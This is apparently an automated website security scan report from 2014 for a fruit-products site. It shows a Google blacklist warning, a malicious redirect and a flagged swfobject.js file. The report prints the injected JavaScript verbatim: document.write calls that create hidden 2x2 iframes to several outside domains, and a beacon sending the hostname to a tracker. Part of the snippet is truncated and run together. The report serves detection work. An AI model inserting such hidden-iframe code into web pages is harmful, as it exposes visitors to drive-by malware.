Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pomero-niv.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://pomero-niv.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pomero-niv.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Sat, 20 Sep 2014 03:32:44 GMT Location: http://investice-do-nemovitosti.eu/cewf.html?h=3256749 Server: Apache/2 Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Expires: Sat, 20 Sep 2014 04:32:44 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://pomero-niv.com/ | 200 OK Content-Length: 8467 Content-Type: text/html | clean |
http://pomero-niv.com/media/system/js/caption.js | 200 OK Content-Length: 1776 Content-Type: application/javascript | clean |
http://pomero-niv.com/home.html | 200 OK Content-Length: 8444 Content-Type: text/html | clean |
http://pomero-niv.com/about-us.html | 200 OK Content-Length: 7403 Content-Type: text/html | clean |
http://pomero-niv.com/products.html | 200 OK Content-Length: 7096 Content-Type: text/html | clean |
http://pomero-niv.com/products/wine.html | 200 OK Content-Length: 9764 Content-Type: text/html | clean |
http://pomero-niv.com/products/confiture.html | 200 OK Content-Length: 6273 Content-Type: text/html | clean |
http://pomero-niv.com/products/gift-package-.html | 200 OK Content-Length: 6983 Content-Type: text/html | clean |
http://pomero-niv.com/products/fruit-in-a-basket.html | 200 OK Content-Length: 6734 Content-Type: text/html | clean |
http://pomero-niv.com/production-process.html | 200 OK Content-Length: 4594 Content-Type: text/html | clean |
http://pomero-niv.com/health-benefits.html | 200 OK Content-Length: 9954 Content-Type: text/html | clean |
http://pomero-niv.com/email.html | 200 OK Content-Length: 7957 Content-Type: text/html | clean |
http://pomero-niv.com/media/system/js/validate.js | 200 OK Content-Length: 4297 Content-Type: application/javascript | clean |
http://pomero-niv.com/gallery.html | 200 OK Content-Length: 5152 Content-Type: text/html | clean |
http://pomero-niv.com/swfobject.js | 200 OK Content-Length: 7559 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=3256749></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hnyf.html?j=1595054></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://flights-central.com/ if(Array.prototype.push==null){ Array.prototype.push=function(_31){ this[this.length]=_31; return this.length;};} var getQueryParamValue=deconcept.util.getRequestParameter; var FlashObject=deconcept.SWFObject; var SWFObject=deconcept.SWFObject; function second_passed() {window.frames['buffer'].location = "http://maxtracker.net/track_s/new_site.php?s="+ document.location.hostname;} document.write('');setTimeout(second_passed, 1000); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=3256749 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=3256749> Hidden iFrame found. size: 2x2 src: http://rewpl.com/outd.html?j=1595054 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://rewpl.com/outd.html?j=1595054> Hidden iFrame found. size: 2x2 src: http://flights-central.com/cuyf.html?j=1595091 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://flights-central.com/cuyf.html?j=1595091> Hidden iFrame found. size: 2x2 src: http://ajaxmint.com/hnyf.html?j=1595054 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hnyf.html?j=1595054> |